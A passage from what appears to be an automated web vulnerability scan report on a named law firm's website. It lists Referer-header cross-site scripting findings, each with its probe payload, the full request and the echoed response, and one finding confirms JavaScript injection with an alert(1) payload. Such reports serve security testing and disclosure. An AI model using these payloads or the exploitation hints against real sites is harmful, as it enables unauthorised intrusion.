Referer: http://www.google.com/search?hl=en&q=3530c"><a>dd14a6ab469

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:27:30 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/DTD/strict.dtd">

<html>
<head>
   
       <title>Arnold & Porter LLP - Global Reach</title>
       <meta name="Description" con
...[SNIP]...
<a href="http://www.google.com/search?hl=en&q=3530c"><a>dd14a6ab469">
...[SNIP]...

2.240. http://www.arnoldporter.com/globals_disclaimer.cfm [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.arnoldporter.com
Path:   /globals_disclaimer.cfm

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dd76e"><a>5d9b079dc37 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /globals_disclaimer.cfm HTTP/1.1
Host: www.arnoldporter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=41801191; __utmz=248117591.1295449755.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263646; __utma=248117591.1964504674.1295449755.1295449755.1295449755.1; __utmc=248117591; __utmb=248117591.1.10.1295449755; sifrFetch=true;
Referer: http://www.google.com/search?hl=en&q=dd76e"><a>5d9b079dc37

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:27:57 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/DTD/strict.dtd">

<html>
<head>
   
       <title>Arnold & Porter LLP</title>
       <meta name="Description" content="Arnold &
...[SNIP]...
<a href="http://www.google.com/search?hl=en&q=dd76e"><a>5d9b079dc37">
...[SNIP]...

2.241. http://www.arnoldporter.com/globals_llp_status.cfm [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.arnoldporter.com
Path:   /globals_llp_status.cfm

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c77c2"><a>9d93e2dce00 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /globals_llp_status.cfm HTTP/1.1
Host: www.arnoldporter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=41801191; __utmz=248117591.1295449755.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263646; __utma=248117591.1964504674.1295449755.1295449755.1295449755.1; __utmc=248117591; __utmb=248117591.1.10.1295449755; sifrFetch=true;
Referer: http://www.google.com/search?hl=en&q=c77c2"><a>9d93e2dce00

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:27:55 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/DTD/strict.dtd">

<html>
<head>
   
       <title>Arnold & Porter LLP</title>
       <meta name="Description" content="Arnold &
...[SNIP]...
<a href="http://www.google.com/search?hl=en&q=c77c2"><a>9d93e2dce00">
...[SNIP]...

2.242. http://www.arnoldporter.com/globals_non_discrimination.cfm [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.arnoldporter.com
Path:   /globals_non_discrimination.cfm

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 92616"><a>de3dc2ef1b7 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /globals_non_discrimination.cfm HTTP/1.1
Host: www.arnoldporter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=41801191; __utmz=248117591.1295449755.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263646; __utma=248117591.1964504674.1295449755.1295449755.1295449755.1; __utmc=248117591; __utmb=248117591.1.10.1295449755; sifrFetch=true;
Referer: http://www.google.com/search?hl=en&q=92616"><a>de3dc2ef1b7

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:28:05 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/DTD/strict.dtd">

<html>
<head>
   
       <title>Arnold & Porter LLP</title>
       <meta name="Description" content="Arnold &
...[SNIP]...
<a href="http://www.google.com/search?hl=en&q=92616"><a>de3dc2ef1b7">
...[SNIP]...

2.243. http://www.arnoldporter.com/globals_operating_status.cfm [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.arnoldporter.com
Path:   /globals_operating_status.cfm

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ca343"><a>0d72f0518a2 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /globals_operating_status.cfm HTTP/1.1
Host: www.arnoldporter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=41801191; __utmz=248117591.1295449755.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263646; __utma=248117591.1964504674.1295449755.1295449755.1295449755.1; __utmc=248117591; __utmb=248117591.1.10.1295449755; sifrFetch=true;
Referer: http://www.google.com/search?hl=en&q=ca343"><a>0d72f0518a2

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:28:05 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/DTD/strict.dtd">

<html>
<head>
   
       <title>Arnold & Porter LLP</title>
       <meta name="Description" content="Arnold &
...[SNIP]...
<a href="http://www.google.com/search?hl=en&q=ca343"><a>0d72f0518a2">
...[SNIP]...

2.244. http://www.arnoldporter.com/globals_privacy_policy.cfm [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.arnoldporter.com
Path:   /globals_privacy_policy.cfm

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 313f3"><a>936b59feb4b was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /globals_privacy_policy.cfm HTTP/1.1
Host: www.arnoldporter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=41801191; __utmz=248117591.1295449755.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263646; __utma=248117591.1964504674.1295449755.1295449755.1295449755.1; __utmc=248117591; __utmb=248117591.1.10.1295449755; sifrFetch=true;
Referer: http://www.google.com/search?hl=en&q=313f3"><a>936b59feb4b

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:28:01 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/DTD/strict.dtd">

<html>
<head>
   
       <title>Arnold & Porter LLP</title>
       <meta name="Description" content="Arnold &
...[SNIP]...
<a href="http://www.google.com/search?hl=en&q=313f3"><a>936b59feb4b">
...[SNIP]...

2.245. http://www.arnoldporter.com/globals_statement_clients_rights.cfm [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.arnoldporter.com
Path:   /globals_statement_clients_rights.cfm

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 92192"><a>3d473dc6629 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /globals_statement_clients_rights.cfm HTTP/1.1
Host: www.arnoldporter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=41801191; __utmz=248117591.1295449755.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263646; __utma=248117591.1964504674.1295449755.1295449755.1295449755.1; __utmc=248117591; __utmb=248117591.1.10.1295449755; sifrFetch=true;
Referer: http://www.google.com/search?hl=en&q=92192"><a>3d473dc6629

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:28:02 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/DTD/strict.dtd">

<html>
<head>
   
       <title>Arnold & Porter LLP</title>
       <meta name="Description" content="Arnold &
...[SNIP]...
<a href="http://www.google.com/search?hl=en&q=92192"><a>3d473dc6629">
...[SNIP]...

2.246. http://www.arnoldporter.com/home.cfm [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.arnoldporter.com
Path:   /home.cfm

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2235a"><a>2aadc693209 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /home.cfm HTTP/1.1
Host: www.arnoldporter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=41801191; __utmz=248117591.1295449755.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263646; __utma=248117591.1964504674.1295449755.1295449755.1295449755.1; __utmc=248117591; __utmb=248117591.1.10.1295449755; sifrFetch=true;
Referer: http://www.google.com/search?hl=en&q=2235a"><a>2aadc693209

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:27:12 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/DTD/strict.dtd">

<html>
<head>
   
       <title>Arnold & Porter LLP</title>
       <meta name="Description" content="Arnold &
...[SNIP]...
<a href="http://www.google.com/search?hl=en&q=2235a"><a>2aadc693209">
...[SNIP]...

2.247. http://www.arnoldporter.com/industries.cfm [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.arnoldporter.com
Path:   /industries.cfm

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 29b3e"><a>0cbb16e6270 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /industries.cfm HTTP/1.1
Host: www.arnoldporter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=41801191; __utmz=248117591.1295449755.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263646; __utma=248117591.1964504674.1295449755.1295449755.1295449755.1; __utmc=248117591; __utmb=248117591.1.10.1295449755; sifrFetch=true;
Referer: http://www.google.com/search?hl=en&q=29b3e"><a>0cbb16e6270

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:27:30 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/DTD/strict.dtd">

<html>
<head>
   
       <title>Arnold & Porter LLP - Industries</title>
       <meta name="Description" conte
...[SNIP]...
<a href="http://www.google.com/search?hl=en&q=29b3e"><a>0cbb16e6270">
...[SNIP]...

2.248. http://www.arnoldporter.com/multimedia.cfm [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.arnoldporter.com
Path:   /multimedia.cfm

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload fdc66'-alert(1)-'26a6562a480 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /multimedia.cfm?action=view&id=674&t=event HTTP/1.1
Host: www.arnoldporter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=41801191; __utmz=248117591.1295449755.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263646; __utma=248117591.1964504674.1295449755.1295449755.1295449755.1; __utmc=248117591; __utmb=248117591.1.10.1295449755; sifrFetch=true;
Referer: http://www.google.com/search?hl=en&q=fdc66'-alert(1)-'26a6562a480

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:27:53 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/DTD/strict.dtd">

<html>
<head>
   
       <title>Arnold & Porter LLP - WEBCAST: Implications of the Dodd-Frank Act for Non-
...[SNIP]...
d_capture_file).click(function() {
                   $.post("process_user_capture.cfm",
                       { name: name,
                        company: company,
                        email: email,
                        from: 'http://www.google.com/search?hl=en&q=fdc66'-alert(1)-'26a6562a480',
                        document: $(this).attr('id').replace('doc', '')
                        },
                       function(data) {
                        }, "json");
                });
               if (requested_capture_forward == '') {
                   setTimeout('$("#doc" + r
...[SNIP]...

2.249. http://www.arnoldporter.com/multimedia.cfm [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.arnoldporter.com
Path:   /multimedia.cfm

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 50ec5"><a>383cf4ea404 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /multimedia.cfm HTTP/1.1
Host: www.arnoldporter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=41801191; __utmz=248117591.1295449755.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263646; __utma=248117591.1964504674.1295449755.1295449755.1295449755.1; __utmc=248117591; __utmb=248117591.1.10.1295449755; sifrFetch=true;
Referer: http://www.google.com/search?hl=en&q=50ec5"><a>383cf4ea404

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:27:08 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/DTD/strict.dtd">

<html>
<head>
   
       <title>Arnold & Porter LLP - Multimedia</title>
       <meta name="Description" conte
...[SNIP]...
<a href="http://www.google.com/search?hl=en&q=50ec5"><a>383cf4ea404">
...[SNIP]...

2.250. http://www.arnoldporter.com/news.cfm [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.arnoldporter.com
Path:   /news.cfm

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b7333"><a>a3f64588368 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /news.cfm HTTP/1.1
Host: www.arnoldporter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=41801191; __utmz=248117591.1295449755.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263646; __utma=248117591.1964504674.1295449755.1295449755.1295449755.1; __utmc=248117591; __utmb=248117591.1.10.1295449755; sifrFetch=true;
Referer: http://www.google.com/search?hl=en&q=b7333"><a>a3f64588368

Response (redirected)

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:27:02 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/DTD/strict.dtd">

<html>
<head>
   
       <title>Arnold & Porter LLP - Press Releases</title>
       <meta name="Description" c
...[SNIP]...
<a href="http://www.google.com/search?hl=en&q=b7333"><a>a3f64588368">
...[SNIP]...

2.251. http://www.arnoldporter.com/offices.cfm [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.arnoldporter.com
Path:   /offices.cfm

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 39941"><a>6ed2a9d4dd6 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /offices.cfm HTTP/1.1
Host: www.arnoldporter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=41801191; __utmz=248117591.1295449755.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263646; __utma=248117591.1964504674.1295449755.1295449755.1295449755.1; __utmc=248117591; __utmb=248117591.1.10.1295449755; sifrFetch=true;
Referer: http://www.google.com/search?hl=en&q=39941"><a>6ed2a9d4dd6

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:27:39 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/DTD/strict.dtd">

<html>
<head>
   
       <title>Arnold & Porter LLP - Offices</title>
       <meta name="Description" content=
...[SNIP]...
<a href="http://www.google.com/search?hl=en&q=39941"><a>6ed2a9d4dd6">
...[SNIP]...

2.252. http://www.arnoldporter.com/practices.cfm [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.arnoldporter.com
Path:   /practices.cfm

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a5d0e"><a>3554c2ba7f3 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /practices.cfm HTTP/1.1
Host: www.arnoldporter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=41801191; __utmz=248117591.1295449755.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263646; __utma=248117591.1964504674.1295449755.1295449755.1295449755.1; __utmc=248117591; __utmb=248117591.1.10.1295449755; sifrFetch=true;
Referer: http://www.google.com/search?hl=en&q=a5d0e"><a>3554c2ba7f3

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:27:23 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/DTD/strict.dtd">

<html>
<head>
   
       <title>Arnold & Porter LLP - Practice Areas &amp; Industries</title>
       <meta nam
...[SNIP]...
<a href="http://www.google.com/search?hl=en&q=a5d0e"><a>3554c2ba7f3">
...[SNIP]...

2.253. http://www.arnoldporter.com/press_releases.cfm [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.arnoldporter.com
Path:   /press_releases.cfm

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9aac8"><a>6236487f9fd was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /press_releases.cfm HTTP/1.1
Host: www.arnoldporter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=41801191; __utmz=248117591.1295449755.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263646; __utma=248117591.1964504674.1295449755.1295449755.1295449755.1; __utmc=248117591; __utmb=248117591.1.10.1295449755; sifrFetch=true;
Referer: http://www.google.com/search?hl=en&q=9aac8"><a>6236487f9fd

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:27:57 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/DTD/strict.dtd">

<html>
<head>
   
       <title>Arnold & Porter LLP - Press Releases</title>
       <meta name="Description" c
...[SNIP]...
<a href="http://www.google.com/search?hl=en&q=9aac8"><a>6236487f9fd">
...[SNIP]...

2.254. http://www.arnoldporter.com/professionals.cfm [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.arnoldporter.com
Path:   /professionals.cfm

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 75416"><a>0aa9a2a2b09 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /professionals.cfm HTTP/1.1
Host: www.arnoldporter.com
Accept: */*
Accept-Language: en
